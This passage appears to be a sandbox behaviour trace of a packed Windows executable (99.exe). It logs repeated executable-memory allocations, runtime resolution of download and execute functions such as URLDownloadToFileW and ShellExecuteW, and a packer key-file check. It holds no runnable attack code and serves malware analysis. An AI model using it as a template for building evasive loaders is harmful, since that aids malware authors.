dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.207] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.208] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.209] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.210] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.211] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.212] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.213] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.213] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.214] VirtualFree (lpAddress=0x3430000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.216] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.217] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.218] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.219] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.220] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.221] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.221] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.222] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.223] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.224] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.225] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.226] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.363] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.364] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.432] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.434] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.435] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.436] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.438] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.440] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0262.442] VirtualFree (lpAddress=0x3450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.218] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0264.219] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0264.219] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x773b0000 [0264.220] GetProcAddress (hModule=0x773b0000, lpProcName="SetForegroundWindow") returned 0x773ef170 [0264.220] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x77240000 [0264.221] GetProcAddress (hModule=0x77240000, lpProcName="CreateCompatibleBitmap") returned 0x77255f49 [0264.221] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x76c20000 [0264.221] GetProcAddress (hModule=0x76c20000, lpProcName="CryptAcquireContextA") returned 0x76c291dd [0264.222] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75cb0000 [0264.222] GetProcAddress (hModule=0x75cb0000, lpProcName="ShellExecuteW") returned 0x75cc3c71 [0264.222] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x771d0000 [0264.223] GetProcAddress (hModule=0x771d0000, lpProcName="PathFileExistsW") returned 0x771e45bf [0264.223] LoadLibraryA (lpLibFileName="WINMM.dll") returned 0x6bed0000 [0264.224] GetProcAddress (hModule=0x6bed0000, lpProcName="PlaySoundW") returned 0x6bed2ef2 [0264.224] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75610000 [0264.225] GetProcAddress (hModule=0x75610000, lpProcName=0x13) returned 0x75616f01 [0264.225] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x75a80000 [0264.226] GetProcAddress (hModule=0x75a80000, lpProcName="URLDownloadToFileW") returned 0x75b166f6 [0264.226] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x6c5c0000 [0264.227] GetProcAddress (hModule=0x6c5c0000, lpProcName="GdiplusStartup") returned 0x6c5e5600 [0264.227] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.228] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.229] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.230] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.231] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.232] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.233] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.234] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.235] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.236] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.237] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.238] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.238] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.239] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.240] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.241] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.242] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.243] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.244] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.245] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.246] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.247] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.247] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.248] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.249] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.250] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.251] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.252] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.253] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.254] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.255] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.257] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.258] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.259] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.260] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.265] GetSystemTime (in: lpSystemTime=0x18fef4 | out: lpSystemTime=0x18fef4*(wYear=0x7e5, wMonth=0xc, wDayOfWeek=0x1, wDay=0x1b, wHour=0x16, wMinute=0xc, wSecond=0x1, wMilliseconds=0xb2)) [0264.265] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.267] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.268] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.269] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.270] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.271] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.272] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.283] ExpandEnvironmentStringsA (in: lpSrc="aspr_keys.ini", lpDst=0x18f6a8, nSize=0x400 | out: lpDst="aspr_keys.ini") returned 0xe [0264.287] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18f9a8, nSize=0xff | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0264.287] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x1fb2128, ftCreationTime.dwLowDateTime=0x18fab0, ftCreationTime.dwHighDateTime=0x1fb214c, ftLastAccessTime.dwLowDateTime=0x1fb2153, ftLastAccessTime.dwHighDateTime=0x2b, ftLastWriteTime.dwLowDateTime=0x18f9a8, ftLastWriteTime.dwHighDateTime=0x18fac8, nFileSizeHigh=0x300000, nFileSizeLow=0x207c580, dwReserved0=0x18fed8, dwReserved1=0x1fb25a2, cFileName="\x88Å\x07\x02¨ù\x18", cAlternateFileName="ÀÅ\x07\x022")) returned 0xffffffff [0264.288] GetTempPathA (in: nBufferLength=0x3ff, lpBuffer=0x18fad0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0264.288] FindFirstFileA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\aspr_keys.ini", lpFindFileData=0x18f954 | out: lpFindFileData=0x18f954*(dwFileAttributes=0x300000, ftCreationTime.dwLowDateTime=0x80000000, ftCreationTime.dwHighDateTime=0x3249e8, ftLastAccessTime.dwLowDateTime=0x18fa50, ftLastAccessTime.dwHighDateTime=0x77a1389e, ftLastWriteTime.dwLowDateTime=0x300138, ftLastWriteTime.dwHighDateTime=0x77a1387a, nFileSizeHigh=0x76630588, nFileSizeLow=0x0, dwReserved0=0x300000, dwReserved1=0x3249f0, cFileName=">\x01", cAlternateFileName="\x8cú\x18")) returned 0xffffffff [0264.288] GetCurrentProcessId () returned 0xc88 [0264.288] GetCurrentProcessId () returned 0xc88 [0264.288] GetCurrentProcessId () returned 0xc88 [0264.288] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] GetCurrentProcessId () returned 0xc88 [0264.289] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0264.293] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.294] GetCurrentProcessId () returned 0xc88 [0264.294] GetCurrentProcessId () returned 0xc88 [0264.294] GetCurrentProcessId () returned 0xc88 [0264.294] GetCurrentProcessId () returned 0xc88 [0264.294] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0264.296] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.297] GetCurrentProcessId () returned 0xc88 [0264.298] GetCurrentProcessId () returned 0xc88 [0264.298] GetCurrentProcessId () returned 0xc88 [0264.298] GetCurrentProcessId () returned 0xc88 [0264.298] GetCurrentProcessId () returned 0xc88 [0264.298] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0264.299] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.301] GetCurrentProcessId () returned 0xc88 [0264.301] GetCurrentProcessId () returned 0xc88 [0264.301] GetCurrentProcessId () returned 0xc88 [0264.301] GetCurrentProcessId () returned 0xc88 [0264.301] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0264.339] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.341] GetCurrentProcessId () returned 0xc88 [0264.341] GetCurrentProcessId () returned 0xc88 [0264.341] GetCurrentProcessId () returned 0xc88 [0264.341] GetCurrentProcessId () returned 0xc88 [0264.341] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x3440000 [0264.342] VirtualFree (lpAddress=0x3440000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.343] GetCurrentProcessId () returned 0xc88 [0264.344] GetCurrentProcessId () returned 0xc88 [0264.344] GetCurrentProcessId () returned 0xc88 [0264.344] GetCurrentProcessId () returned 0xc88 [0264.344] GetCurrentProcessId () returned 0xc88 [0264.344] GetCurrentProcessId () returned 0xc88 [0264.344] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.345] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.346] VirtualFree (lpAddress=0x2660000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.347] VirtualFree (lpAddress=0x2710000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.347] VirtualFree (lpAddress=0x27c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.349] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] GetCurrentProcessId () returned 0xc88 [0264.350] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.352] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] GetCurrentProcessId () returned 0xc88 [0264.353] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.354] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] GetCurrentProcessId () returned 0xc88 [0264.355] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.356] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] GetCurrentProcessId () returned 0xc88 [0264.357] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.358] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] GetCurrentProcessId () returned 0xc88 [0264.359] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.360] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.360] GetCurrentProcessId () returned 0xc88 [0264.361] GetCurrentProcessId () returned 0xc88 [0264.361] GetCurrentProcessId () returned 0xc88 [0264.361] GetCurrentProcessId () returned 0xc88 [0264.361] GetCurrentProcessId () returned 0xc88 [0264.361] GetCurrentProcessId () returned 0xc88 [0264.361] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.361] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] GetCurrentProcessId () returned 0xc88 [0264.362] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.363] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.364] GetCurrentProcessId () returned 0xc88 [0264.365] GetCurrentProcessId () returned 0xc88 [0264.365] GetCurrentProcessId () returned 0xc88 [0264.365] GetCurrentProcessId () returned 0xc88 [0264.365] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.366] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.367] GetCurrentProcessId () returned 0xc88 [0264.367] GetCurrentProcessId () returned 0xc88 [0264.367] GetCurrentProcessId () returned 0xc88 [0264.367] GetCurrentProcessId () returned 0xc88 [0264.367] GetCurrentProcessId () returned 0xc88 [0264.367] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.369] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] GetCurrentProcessId () returned 0xc88 [0264.370] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x1000, flProtect=0x40) returned 0x2110000 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.371] GetCurrentProcessId () returned 0xc88 [0264.373] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.374] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.375] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.376] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.378] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.379] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.467] VirtualFree (lpAddress=0x25b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0264.472] LoadLibraryA (lpLibFileName="user32.dll") returned 0x773b0000 [0264.473] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76c20000 [0264.473] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0264.474] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75cb0000 [0264.474] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x771d0000 [0264.486] GetProcAddress (hModule=0x779e0000, lpProcName="RtlEnterCriticalSection") returned 0x77a022b0 [0264.487] GetProcAddress (hModule=0x779e0000, lpProcName="RtlLeaveCriticalSection") returned 0x77a02270 [0264.487] GetProcAddress (hModule=0x779e0000, lpProcName="RtlInitializeCriticalSection") returned 0x77a12c42 [0264.506] GetProcAddress (hModule=0x769b0000, lpProcName="SetLastError") returned 0x769c11a9 [0264.507] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0264.512] GetProcessHeap () returned 0x300000 [0264.512] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x410) returned 0x3249f0 [0264.514] GetProcessHeap () returned 0x300000 [0264.514] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x8, Size=0x10) returned 0x314a08 [0264.514] GetProcessHeap () returned 